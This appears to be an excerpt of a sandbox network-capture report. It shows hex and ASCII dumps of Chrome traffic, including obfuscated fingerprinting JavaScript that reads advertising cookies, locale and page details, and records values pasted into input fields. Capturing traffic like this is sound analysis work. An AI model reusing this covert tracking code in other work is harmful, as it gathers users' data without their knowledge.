                                                                                                                                                                                                                                                                                                                                                                          2024-11-13 16:29:15 UTC1378INData Raw: b6 ae e6 1f 24 43 dd 92 73 ec 75 6f 3c 3c 93 bf 72 1b 3d bb 28 c6 75 d6 9f 74 4c 64 b6 7d 3a a1 01 67 2b 68 f4 e5 16 b8 54 98 68 58 f6 4a 39 8f cb 5c 27 36 e8 bd 55 41 1a 3b 4e d8 20 c8 93 44 96 3a 9a dd 8c e4 36 a1 5f 96 49 77 15 7d 8a b0 99 dc 3d d7 7d b8 12 71 5c 14 85 22 4c 22 23 b4 d5 e7 4e 90 2d c7 a1 81 94 0b b6 6c 70 38 2f cb 2d 36 bb de 5f 14 bd 41 43 99 36 9a 32 b2 7d 96 4a 10 96 49 d8 33 77 1f 74 19 50 3c e5 7a 60 2b 7d 94 8d d4 22 2b 8e e1 f8 be 35 5a d8 07 54 e9 0c 4a ac d7 36 c6 87 c9 e0 86 37 06 e2 16 b6 1a 68 17 66 a0 f5 16 a6 d8 e0 d7 61 6f 77 50 fe d2 31 3a 86 cd e6 f3 f8 8e c7 c8 4e ea 30 e0 14 e6 e8 29 1c 16 cf a6 73 d9 69 4b cd 30 7d d4 b9 9f 60 36 0f 70 32 b0 6f 3e 49 4f 2f 67 af 16 90 59 ab ad 3b 3c 42 f2 16 fa 66 10 b8 9d b6 68 bb
                                                                                                                                                                                                                                                                                                                                                                          Data Ascii: $Csuo<<r=(utLd}:g+hThXJ9\'6UA;N D:6_Iw}=}q\"L"#N-lp8/-6_AC62}JI3wtP<z`+}"+5ZTJ67hfaowP1:N0)siK0}`6p2o>IO/gY;<Bfh
                                                                                                                                                                                                                                                                                                                                                                          2024-11-13 16:29:15 UTC1378INData Raw: eb 04 a4 26 b6 c5 64 62 66 52 c6 ee 78 a0 a6 b6 4a d8 b0 ad c3 ca 5b 30 96 b8 e1 f0 06 b5 7a ab 8f 8d 99 8a 40 2f e0 97 75 40 27 a8 9b 13 ed 46 b0 ae 9f 19 48 51 06 df 08 70 d0 10 11 4c aa 36 f5 cd 2e 1e d7 40 84 b5 00 49 08 11 6c 56 4a b8 34 a9 79 04 4e ca 0c 48 b7 4d 8b 54 0f 82 85 24 da 62 52 44 da 42 96 32 a8 12 bc 11 50 73 ed 77 90 8a dd 03 47 b4 db c2 a2 4b 91 84 03 5d 2a d6 67 4e 49 af 6e a0 4d 57 a9 28 d3 b8 0c 5d c6 d8 68 bd b9 24 d6 10 1b dd f7 e3 8a 7c 59 ff 53 78 a2 23 37 7c 2b 67 bc e7 f2 13 67 94 06 f1 d7 ee 7c 8c e1 a8 e4 a0 9a e7 3a ec ed 1c 98 35 1c 13 00 07 55 52 86 d9 7f 89 6f 64 ba 5f 4b b1 b6 81 4d 6f 57 d2 ac b9 b2 4f 76 eb ff 00 47 57 23 6a d5 e8 31 a3 c5 1f 4d 4b be ff c2 34 49 7f 4c 9c 89 ee b8 d8 22 1c db 6f 31 e6 7d ff cd d3 6d
                                                                                                                                                                                                                                                                                                                                                                          Data Ascii: &dbfRxJ[0z@/u@'FHQpL6.@IlVJ4yNHMT$bRDB2PswGK]*gNInMW(]h$|YSx#7|+gg|:5URod_KMoWOvGW#j1MK4IL"o1}m
                                                                                                                                                                                                                                                                                                                                                                          2024-11-13 16:29:15 UTC1378INData Raw: 00 e1 72 d9 a2 2f 24 2b f9 5c 52 52 4f c8 e5 3f 55 df de 80 6f a2 0c 78 b2 e9 f0 3d 94 0e 4f 32 dd 5b 4b 08 4c c9 c2 7f 8e 37 7a 70 4e ab 0d 5b 4a 73 62 8b 13 38 0e 42 d6 33 78 a8 5b 81 63 3a 4a 28 78 b0 7b b0 9f 23 d2 46 98 11 35 03 50 d0 b1 2c e1 6b 03 41 0d da f0 13 23 aa 36 84 0b 93 79 a8 85 b8 d8 1d 18 c8 19 3b eb 72 95 4a 92 b9 8e 92 b1 a2 d6 40 2a 6d 0f 9d 03 70 c6 9c 02 87 b9 03 5a f3 d4 54 44 2c 45 c2 d6 ad 73 0a d0 23 09 1c c3 a6 72 5d ab 47 1b 97 ef 36 56 86 9d 88 54 4f 1a ea 40 03 eb 77 4d dd 7e 64 8c a0 aa be 69 04 31 2e 44 a0 32 ad b2 a2 f4 c7 6f d6 dc 11 c1 a8 cd 9a 8f 44 64 3a 28 75 e2 83 fd 9d 8c 5c 09 f6 86 da 52 5d 45 af 8f da c2 d7 6a dc a6 9d 44 ad ef 99 1f 00 e0 e9 38 77 49 29 15 74 0f 0e 7b 6e 79 35 6a 47 de c1 48 41 ee 91 38 00 67
                                                                                                                                                                                                                                                                                                                                                                          Data Ascii: r/$+\RRO?Uox=O2[KL7zpN[Jsb8B3x[c:J(x{#F5P,kA#6y;rJ@*mpZTD,Es#r]G6VTO@wM~di1.D2oDd:(u\R]EjD8wI)t{ny5jGHA8g
                                                                                                                                                                                                                                                                                                                                                                          2024-11-13 16:29:15 UTC1378INData Raw: 3f 38 72 95 0e b2 88 01 59 ae 94 15 dd 80 68 b5 1a 7b 31 c7 00 4e 15 98 79 aa be 42 41 2e ad b8 4b 18 e0 29 5e 1c 72 32 0d 02 c6 54 3c d7 0e 82 14 2d 24 02 89 53 07 11 20 c9 35 ff a3 31 9b fc ab dd 0f c9 b5 0e db be 73 09 17 60 61 00 0a c0 b2 41 62 2e 72 d9 aa 9d 89 d6 95 d4 ff 50 a6 53 b4 1c 2e f1 42 1d 20 cb 40 e5 e6 89 a4 0d 29 31 4b 12 e6 85 89 0f 64 f2 d5 fd dd 12 4a b8 90 2a 74 10 f4 a6 d9 d6 7d 98 4c 66 7a af 48 ea 33 96 92 3d 11 11 7d 9a da de 67 7f 11 76 43 9f fd 20 a2 bb e4 ec 99 a8 d8 99 66 cd 6d d7 c5 59 d8 0d 3c 5c 96 56 b1 41 cd 9a 58 6d 64 07 9f 35 7f a8 88 63 14 ec b2 b3 9d 47 62 a5 c6 21 db 79 ec 03 f0 9d 7c b6 03 5a c1 9d ff b6 d0 0f a0 77 fc e0 6c f2 95 c2 23 a2 db 70 37 e8 fe f5 44 ca 36 48 ee 54 d8 6b 63 56 e6 51 2d 58 8b e3 62 8a 1d
                                                                                                                                                                                                                                                                                                                                                                          Data Ascii: ?8rYh{1NyBA.K)^r2T<-$S 51s`aAb.rPS.B @)1KdJ*t}LfzH3=}gvC fmY<\VAXmd5cGb!y|Zwl#p7D6HTkcVQ-Xb
                                                                                                                                                                                                                                                                                                                                                                          2024-11-13 16:29:15 UTC1102INData Raw: 5b df 22 35 f0 65 76 da d6 21 b8 5e 4c 2e 2f 7b 98 24 bf 09 4f e9 af 2e b5 26 46 c0 65 c4 9a 69 01 88 e4 57 00 92 c8 1d e2 ad 7c c8 74 45 19 9e da b3 0a fa fd b4 8d 19 49 82 44 64 78 56 cf 00 a6 08 30 05 80 a5 b9 88 c8 08 cc 8e 15 bb f2 7e 53 6e 35 9a ab 49 ba de a2 75 ca db 29 21 5d 9e 68 d8 2e f8 59 10 ef 72 84 62 eb ce 15 77 e3 22 29 45 8e 39 e4 e4 07 a3 49 6f a6 8a a5 22 19 23 be a0 84 ba ba 89 c0 80 b9 1c c0 41 b6 72 92 49 81 10 5f 91 59 56 12 51 c2 a6 84 f5 4a 54 6f 84 2e d1 a0 3b 32 a1 b2 45 82 f5 60 2f 45 8b 24 27 64 c7 b3 86 20 5d 50 a4 50 d3 39 5a 57 e5 84 8f 36 47 50 18 70 12 58 55 23 86 d6 41 ba 19 54 0c 0d f2 7b 33 c3 d7 e0 d3 0f 74 a1 b4 d7 8f 15 b5 19 38 95 bc 58 98 d1 e4 df af 12 60 0c 86 4a 3c 80 42 78 da 01 2a a5 07 c7 4c 40 cb d0 8b 1e
                                                                                                                                                                                                                                                                                                                                                                          Data Ascii: ["5ev!^L./{$O.&FeiW|tEIDdxV0~Sn5Iu)!]h.Yrbw")E9Io"#ArI_YVQJTo.;2E`/E$'d ]PP9ZW6GPpXU#AT{3t8X`J<Bx*L@


                                                                                                                                                                                                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                                                          57192.168.2.1749839143.204.98.1284436552C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                          2024-11-13 16:29:15 UTC390OUTGET /sxp/i/c6a47dab391ea1c8a8b2709f8479395d.js HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                          Host: euob.powerrobotflower.com
                                                                                                                                                                                                                                                                                                                                                                          Connection: keep-alive
                                                                                                                                                                                                                                                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                                                                                                                          Accept: */*
                                                                                                                                                                                                                                                                                                                                                                          Sec-Fetch-Site: none
                                                                                                                                                                                                                                                                                                                                                                          Sec-Fetch-Mode: cors
                                                                                                                                                                                                                                                                                                                                                                          Sec-Fetch-Dest: empty
                                                                                                                                                                                                                                                                                                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                                                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                                                                                                                                          2024-11-13 16:29:15 UTC507INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                                          Content-Type: text/javascript; charset=utf-8
                                                                                                                                                                                                                                                                                                                                                                          Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                                                                          Connection: close
                                                                                                                                                                                                                                                                                                                                                                          Server: Caddy
                                                                                                                                                                                                                                                                                                                                                                          Date: Wed, 13 Nov 2024 16:29:12 GMT
                                                                                                                                                                                                                                                                                                                                                                          Cache-Control: max-age=43200
                                                                                                                                                                                                                                                                                                                                                                          Expires: Thu, 14 Nov 2024 02:34:25 GMT
                                                                                                                                                                                                                                                                                                                                                                          ETag: "1b029-rANHG+5y9EkyGGgyif0zejNBMYI"
                                                                                                                                                                                                                                                                                                                                                                          Vary: Accept-Encoding
                                                                                                                                                                                                                                                                                                                                                                          X-Cache: Hit from cloudfront
                                                                                                                                                                                                                                                                                                                                                                          Via: 1.1 fa5a3d5abd34c6fac657b045a4dcbdc4.cloudfront.net (CloudFront)
                                                                                                                                                                                                                                                                                                                                                                          X-Amz-Cf-Pop: FRA50-C1
                                                                                                                                                                                                                                                                                                                                                                          X-Amz-Cf-Id: _xMEMq55MqJb7Yue9hzUZZwcU1zV1yUmRDfOJXVZWKQMYV0yHupteg==
                                                                                                                                                                                                                                                                                                                                                                          Age: 6890
                                                                                                                                                                                                                                                                                                                                                                          2024-11-13 16:29:15 UTC16384INData Raw: 31 33 31 64 61 0d 0a 21 66 75 6e 63 74 69 6f 6e 28 74 29 7b 76 61 72 20 6e 3d 7b 7d 3b 66 75 6e 63 74 69 6f 6e 20 72 28 65 29 7b 69 66 28 6e 5b 65 5d 29 72 65 74 75 72 6e 20 6e 5b 65 5d 2e 65 78 70 6f 72 74 73 3b 76 61 72 20 69 3d 6e 5b 65 5d 3d 7b 69 3a 65 2c 6c 3a 21 31 2c 65 78 70 6f 72 74 73 3a 7b 7d 7d 3b 72 65 74 75 72 6e 20 74 5b 65 5d 2e 63 61 6c 6c 28 69 2e 65 78 70 6f 72 74 73 2c 69 2c 69 2e 65 78 70 6f 72 74 73 2c 72 29 2c 69 2e 6c 3d 21 30 2c 69 2e 65 78 70 6f 72 74 73 7d 72 2e 6d 3d 74 2c 72 2e 63 3d 6e 2c 72 2e 64 3d 66 75 6e 63 74 69 6f 6e 28 74 2c 6e 2c 65 29 7b 72 2e 6f 28 74 2c 6e 29 7c 7c 4f 62 6a 65 63 74 2e 64 65 66 69 6e 65 50 72 6f 70 65 72 74 79 28 74 2c 6e 2c 7b 65 6e 75 6d 65 72 61 62 6c 65 3a 21 30 2c 67 65 74 3a 65 7d 29 7d 2c
                                                                                                                                                                                                                                                                                                                                                                          Data Ascii: 131da!function(t){var n={};function r(e){if(n[e])return n[e].exports;var i=n[e]={i:e,l:!1,exports:{}};return t[e].call(i.exports,i,i.exports,r),i.l=!0,i.exports}r.m=t,r.c=n,r.d=function(t,n,e){r.o(t,n)||Object.defineProperty(t,n,{enumerable:!0,get:e})},
                                                                                                                                                                                                                                                                                                                                                                          2024-11-13 16:29:15 UTC16384INData Raw: 72 65 74 75 72 6e 20 78 2e 24 74 28 22 5f 75 65 74 76 69 64 22 29 7c 7c 22 2d 22 7d 63 61 74 63 68 28 74 29 7b 7d 72 65 74 75 72 6e 22 2d 22 7d 2c 4b 6e 3a 66 75 6e 63 74 69 6f 6e 28 29 7b 74 72 79 7b 76 61 72 20 74 3d 61 2e 63 6f 6f 6b 69 65 2e 6d 61 74 63 68 28 2f 5f 67 61 63 5f 55 41 5c 2d 5c 64 2b 5c 2d 5c 64 2b 5c 3d 28 2e 2a 3f 29 5c 3b 2f 29 5b 31 5d 3b 69 66 28 33 3d 3d 3d 74 2e 73 70 6c 69 74 28 22 2e 22 29 2e 6c 65 6e 67 74 68 29 7b 76 61 72 20 6e 3d 74 2e 73 70 6c 69 74 28 22 2e 22 29 5b 31 5d 3b 69 66 28 6d 2e 47 28 6e 29 29 72 65 74 75 72 6e 20 6d 2e 56 28 28 78 2e 48 74 28 29 2d 31 65 33 2a 6d 2e 56 28 6e 29 29 2f 31 65 33 29 7d 7d 63 61 74 63 68 28 74 29 7b 7d 72 65 74 75 72 6e 22 2d 22 7d 2c 5a 6e 3a 66 75 6e 63 74 69 6f 6e 28 29 7b 74 72
                                                                                                                                                                                                                                                                                                                                                                          Data Ascii: return x.$t("_uetvid")||"-"}catch(t){}return"-"},Kn:function(){try{var t=a.cookie.match(/_gac_UA\-\d+\-\d+\=(.*?)\;/)[1];if(3===t.split(".").length){var n=t.split(".")[1];if(m.G(n))return m.V((x.Ht()-1e3*m.V(n))/1e3)}}catch(t){}return"-"},Zn:function(){tr
                                                                                                                                                                                                                                                                                                                                                                          2024-11-13 16:29:16 UTC16384INData Raw: 6c 65 6d 65 6e 74 73 2e 70 75 73 68 28 6e 29 7d 3b 6a 3f 79 2e 58 6e 28 22 63 74 22 2c 4f 2c 66 75 6e 63 74 69 6f 6e 28 74 2c 6e 29 7b 74 72 79 7b 69 66 28 6e 29 4f 3d 28 4f 2b 3d 22 26 78 65 72 3d 22 2b 43 28 4a 53 4f 4e 2e 73 74 72 69 6e 67 69 66 79 28 6e 29 29 29 2e 72 65 70 6c 61 63 65 28 2f 26 61 62 5c 3d 2e 2a 3f 28 26 7c 24 29 2f 2c 22 26 61 62 3d 6a 78 2e 34 2e 32 3b 24 31 22 29 2c 52 28 4f 29 2c 67 5b 4a 5d 3d 66 75 6e 63 74 69 6f 6e 28 74 2c 6e 2c 72 2c 65 2c 69 2c 61 2c 6f 2c 63 29 7b 56 28 74 2c 6e 2c 72 2c 65 2c 69 2c 61 2c 6f 2c 63 29 7d 3b 65 6c 73 65 20 69 66 28 74 29 7b 76 61 72 20 72 3d 4a 53 4f 4e 2e 70 61 72 73 65 28 74 29 2c 65 3d 72 2e 63 7c 7c 22 22 3b 56 28 72 2c 65 2c 72 2e 72 61 29 7d 7d 63 61 74 63 68 28 74 29 7b 7d 7d 29 3a 52
                                                                                                                                                                                                                                                                                                                                                                          Data Ascii: lements.push(n)};j?y.Xn("ct",O,function(t,n){try{if(n)O=(O+="&xer="+C(JSON.stringify(n))).replace(/&ab\=.*?(&|$)/,"&ab=jx.4.2;$1"),R(O),g[J]=function(t,n,r,e,i,a,o,c){V(t,n,r,e,i,a,o,c)};else if(t){var r=JSON.parse(t),e=r.c||"";V(r,e,r.ra)}}catch(t){}}):R
                                                                                                                                                                                                                                                                                                                                                                          2024-11-13 16:29:16 UTC16384INData Raw: 67 74 68 29 72 65 74 75 72 6e 21 31 3b 66 6f 72 28 76 61 72 20 6e 3d 74 5b 30 5d 2c 72 3d 74 5b 30 5d 2c 65 3d 31 3b 65 3c 74 2e 6c 65 6e 67 74 68 3b 65 2b 2b 29 74 5b 65 5d 3c 6e 26 26 28 6e 3d 74 5b 65 5d 29 2c 74 5b 65 5d 3e 72 26 26 28 72 3d 74 5b 65 5d 29 3b 72 65 74 75 72 6e 20 72 2d 6e 7d 28 65 29 3c 3d 36 29 72 65 74 75 72 6e 20 5f 74 28 38 32 2c 74 5b 72 5d 29 2c 21 30 7d 7d 2c 72 72 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 21 21 63 2e 71 72 28 29 7d 2c 65 72 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 21 21 75 5b 6f 2e 58 28 22 4e 4e 61 66 58 7f 78 65 42 72 63 78 61 65 62 22 2c 31 37 29 5d 7d 2c 69 72 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 76 61 72 20 74 3d 6f 2e 58 28 22 38 3a 3d 22 2c 39 35 29 3b 69 66 28 75 5b 74 5d 26 26
                                                                                                                                                                                                                                                                                                                                                                          Data Ascii: gth)return!1;for(var n=t[0],r=t[0],e=1;e<t.length;e++)t[e]<n&&(n=t[e]),t[e]>r&&(r=t[e]);return r-n}(e)<=6)return _t(82,t[r]),!0}},rr=function(){return!!c.qr()},er=function(){return!!u[o.X("NNafXxeBrcxaeb",17)]},ir=function(){var t=o.X("8:=",95);if(u[t]&&
                                                                                                                                                                                                                                                                                                                                                                          2024-11-13 16:29:16 UTC12771INData Raw: 68 28 72 2e 78 29 2c 6e 2e 70 75 73 68 28 72 2e 79 29 2c 6e 2e 70 75 73 68 28 65 2e 69 64 29 2c 6e 2e 70 75 73 68 28 65 2e 63 6c 61 73 73 4e 61 6d 65 29 7d 72 65 74 75 72 6e 20 6e 2e 6a 6f 69 6e 28 22 2c 22 29 7d 72 65 74 75 72 6e 22 30 22 7d 7d 2c 6e 65 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 76 61 72 20 74 3d 75 2e 49 6e 74 6c 2e 44 61 74 65 54 69 6d 65 46 6f 72 6d 61 74 28 29 2e 72 65 73 6f 6c 76 65 64 4f 70 74 69 6f 6e 73 28 29 3b 72 65 74 75 72 6e 5b 74 2e 74 69 6d 65 5a 6f 6e 65 2c 74 2e 6c 6f 63 61 6c 65 2c 74 2e 6e 75 6d 62 65 72 69 6e 67 53 79 73 74 65 6d 2c 74 2e 63 61 6c 65 6e 64 61 72 5d 2e 6a 6f 69 6e 28 22 2c 22 29 7d 3b 6e 65 2e 49 65 3d 21 30 3b 76 61 72 20 72 65 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 76 61 72 20 74 3d 48 54 4d 4c 45 6c 65 6d 65
                                                                                                                                                                                                                                                                                                                                                                          Data Ascii: h(r.x),n.push(r.y),n.push(e.id),n.push(e.className)}return n.join(",")}return"0"}},ne=function(){var t=u.Intl.DateTimeFormat().resolvedOptions();return[t.timeZone,t.locale,t.numberingSystem,t.calendar].join(",")};ne.Ie=!0;var re=function(){var t=HTMLEleme
                                                                                                                                                                                                                                                                                                                                                                          2024-11-13 16:29:16 UTC16384INData Raw: 37 65 34 66 0d 0a 6f 2e 43 72 28 29 2c 66 3d 30 3b 66 3c 65 2e 6c 65 6e 67 74 68 3b 66 2b 2b 29 74 72 79 7b 76 61 72 20 73 3d 72 28 65 5b 66 5d 29 3b 73 26 26 28 6e 2e 6d 72 3d 6e 2e 6d 72 7c 7c 5b 5d 2c 6e 2e 6d 72 2e 70 75 73 68 28 7b 77 3a 66 2c 69 3a 73 7d 29 29 7d 63 61 74 63 68 28 74 29 7b 7d 76 61 72 20 76 3d 5b 7b 7a 65 3a 22 61 64 6d 62 22 2c 56 65 3a 7b 4a 65 3a 5b 22 61 66 6d 61 2d 73 64 6b 22 5d 2c 57 65 3a 5b 22 61 66 6d 61 2d 73 64 6b 22 5d 7d 2c 47 65 3a 66 75 6e 63 74 69 6f 6e 28 29 7b 69 66 28 74 2e 6d 61 74 63 68 28 22 2e 67 2e 64 6f 75 62 6c 65 63 6c 69 63 6b 2e 6e 65 74 22 29 29 7b 76 61 72 20 6e 3d 74 2e 6d 61 74 63 68 28 2f 5c 26 6d 73 69 64 5c 3d 28 2e 2a 3f 29 5c 26 2f 29 2c 72 3d 74 2e 6d 61 74 63 68 28 2f 5c 26 5f 70 61 63 6b 61
                                                                                                                                                                                                                                                                                                                                                                          Data Ascii: 7e4fo.Cr(),f=0;f<e.length;f++)try{var s=r(e[f]);s&&(n.mr=n.mr||[],n.mr.push({w:f,i:s}))}catch(t){}var v=[{ze:"admb",Ve:{Je:["afma-sdk"],We:["afma-sdk"]},Ge:function(){if(t.match(".g.doubleclick.net")){var n=t.match(/\&msid\=(.*?)\&/),r=t.match(/\&_packa
                                                                                                                                                                                                                                                                                                                                                                          2024-11-13 16:29:16 UTC15959INData Raw: 70 61 73 74 65 22 2c 66 75 6e 63 74 69 6f 6e 28 29 7b 74 7c 7c 28 74 3d 21 30 2c 63 2e 7a 6e 28 66 75 6e 63 74 69 6f 6e 28 29 7b 70 28 22 70 65 6d 22 2c 7b 76 61 6c 3a 6f 2e 5a 28 6e 2e 76 61 6c 75 65 29 7d 29 7d 29 29 7d 29 2c 61 2e 62 6e 28 6e 2c 22 62 6c 75 72 22 2c 66 75 6e 63 74 69 6f 6e 28 74 29 7b 74 72 79 7b 72 7c 7c 28 66 2e 71 75 65 72 79 53 65 6c 65 63 74 6f 72 28 22 69 6e 70 75 74 3a 2d 77 65 62 6b 69 74 2d 61 75 74 6f 66 69 6c 6c 22 29 26 26 28 72 3d 21 30 29 2c 63 2e 42 6e 28 29 26 26 75 2e 67 65 74 43 6f 6d 70 75 74 65 64 53 74 79 6c 65 28 74 2e 74 61 72 67 65 74 29 2e 66 69 6c 74 65 72 2e 6d 61 74 63 68 28 2f 5e 67 72 61 79 73 63 61 6c 65 5c 28 2e 2b 5c 29 20 62 72 69 67 68 74 6e 65 73 73 5c 28 28 31 29 3f 2e 2a 5c 29 20 63 6f 6e 74 72 61
                                                                                                                                                                                                                                                                                                                                                                          Data Ascii: paste",function(){t||(t=!0,c.zn(function(){p("pem",{val:o.Z(n.value)})}))}),a.bn(n,"blur",function(t){try{r||(f.querySelector("input:-webkit-autofill")&&(r=!0),c.Bn()&&u.getComputedStyle(t.target).filter.match(/^grayscale\(.+\) brightness\((1)?.*\) contra
                                                                                                                                                                                                                                                                                                                                                                          2024-11-13 16:29:16 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                                                                                          Data Ascii: 0


                                                                                                                                                                                                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                                                          58192.168.2.1749866104.26.4.394436552C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                          2024-11-13 16:29:15 UTC353OUTGET /x/45414/inlinks.js HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                          Host: jscloud.net
                                                                                                                                                                                                                                                                                                                                                                          Connection: keep-alive
                                                                                                                                                                                                                                                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                                                                                                                          Accept: */*
                                                                                                                                                                                                                                                                                                                                                                          Sec-Fetch-Site: none
                                                                                                                                                                                                                                                                                                                                                                          Sec-Fetch-Mode: cors
                                                                                                                                                                                                                                                                                                                                                                          Sec-Fetch-Dest: empty
                                                                                                                                                                                                                                                                                                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                                                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                                                                                                                                          2024-11-13 16:29:15 UTC868INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                                          Date: Wed, 13 Nov 2024 16:29:15 GMT
                                                                                                                                                                                                                                                                                                                                                                          Content-Type: application/javascript
                                                                                                                                                                                                                                                                                                                                                                          Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                                                                          Connection: close
                                                                                                                                                                                                                                                                                                                                                                          last-modified: Tue, 21 May 2024 15:55:07 GMT
                                                                                                                                                                                                                                                                                                                                                                          vary: Accept-Encoding,User-Agent
                                                                                                                                                                                                                                                                                                                                                                          access-control-allow-origin: *
                                                                                                                                                                                                                                                                                                                                                                          Cache-Control: max-age=14400
                                                                                                                                                                                                                                                                                                                                                                          CF-Cache-Status: HIT
                                                                                                                                                                                                                                                                                                                                                                          Age: 608
                                                                                                                                                                                                                                                                                                                                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=OfuFRoHUh8M%2F%2BDaUl7sIZP65z0kgjkNrj8aKkn8%2FId4s97MMB7Y5YBIKlRcOYvk6os1Te3b7KErhQ2zVTDRGrOWveNUH5ZRcCamK2oPN9cHZzYGHusagn%2FkFVODQ"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                                                                                                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                                                                                                                                          Server: cloudflare
                                                                                                                                                                                                                                                                                                                                                                          CF-RAY: 8e2023bb6e27ec30-SEA
                                                                                                                                                                                                                                                                                                                                                                          server-timing: cfL4;desc="?proto=TCP&rtt=49818&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2824&recv_bytes=931&delivery_rate=58213&cwnd=32&unsent_bytes=0&cid=4039218d60745d7b&ts=206&x=0"
                                                                                                                                                                                                                                                                                                                                                                          2024-11-13 16:29:15 UTC501INData Raw: 64 35 37 0d 0a 66 75 6e 63 74 69 6f 6e 20 66 69 6e 64 45 6c 28 65 2c 74 29 7b 76 61 72 20 6e 3d 64 6f 63 75 6d 65 6e 74 2e 71 75 65 72 79 53 65 6c 65 63 74 6f 72 41 6c 6c 28 65 29 3b 66 6f 72 28 76 61 72 20 72 3d 30 3b 72 3c 6e 2e 6c 65 6e 67 74 68 3b 72 2b 2b 29 69 66 28 6e 5b 72 5d 2e 74 65 78 74 43 6f 6e 74 65 6e 74 2e 69 6e 63 6c 75 64 65 73 28 74 29 29 72 65 74 75 72 6e 20 6e 5b 72 5d 3b 72 65 74 75 72 6e 20 6e 75 6c 6c 7d 0a 76 61 72 20 67 65 74 4a 53 4f 4e 3d 66 75 6e 63 74 69 6f 6e 28 65 2c 6e 29 7b 76 61 72 20 74 3d 6e 65 77 20 58 4d 4c 48 74 74 70 52 65 71 75 65 73 74 3b 74 2e 6f 70 65 6e 28 22 47 45 54 22 2c 65 2c 21 30 29 2c 74 2e 72 65 73 70 6f 6e 73 65 54 79 70 65 3d 22 6a 73 6f 6e 22 2c 74 2e 6f 6e 6c 6f 61 64 3d 66 75 6e 63 74 69 6f 6e 28
                                                                                                                                                                                                                                                                                                                                                                          Data Ascii: d57function findEl(e,t){var n=document.querySelectorAll(e);for(var r=0;r<n.length;r++)if(n[r].textContent.includes(t))return n[r];return null}var getJSON=function(e,n){var t=new XMLHttpRequest;t.open("GET",e,!0),t.responseType="json",t.onload=function(
                                                                                                                                                                                                                                                                                                                                                                          2024-11-13 16:29:15 UTC1369INData Raw: 6f 6e 50 61 74 68 2e 72 65 70 6c 61 63 65 28 22 23 62 6f 64 79 22 2c 22 22 29 2c 66 75 6e 63 74 69 6f 6e 28 65 2c 6e 29 7b 69 66 28 6e 75 6c 6c 3d 3d 3d 65 29 7b 76 61 72 20 74 3d 64 6f 63 75 6d 65 6e 74 2e 67 65 74 45 6c 65 6d 65 6e 74 73 42 79 54 61 67 4e 61 6d 65 28 22 70 22 29 2c 61 3d 64 6f 63 75 6d 65 6e 74 2e 67 65 74 45 6c 65 6d 65 6e 74 73 42 79 54 61 67 4e 61 6d 65 28 22 6c 69 22 29 3b 66 6f 72 28 76 61 72 20 72 20 69 6e 20 6e 29 7b 76 61 72 20 6f 3d 6e 5b 72 5d 2e 74 2c 69 3d 6e 5b 72 5d 2e 61 2c 73 3d 6e 5b 72 5d 2e 6e 2c 6c 6e 6b 64 3d 66 61 6c 73 65 3b 69 66 28 22 70 22 3d 3d 3d 6f 7c 7c 22 6c 69 22 3d 3d 3d 6f 29 7b 76 61 72 20 70 2c 6c 3d 6e 5b 72 5d 2e 6f 2c 6c 72 65 66 3d 6e 5b 72 5d 2e 6f 2e 72 65 70 6c 61 63 65 28 27 5c 5c 27 2c 20 27
                                                                                                                                                                                                                                                                                                                                                                          Data Ascii: onPath.replace("#body",""),function(e,n){if(null===e){var t=document.getElementsByTagName("p"),a=document.getElementsByTagName("li");for(var r in n){var o=n[r].t,i=n[r].a,s=n[r].n,lnkd=false;if("p"===o||"li"===o){var p,l=n[r].o,lref=n[r].o.replace('\\', '
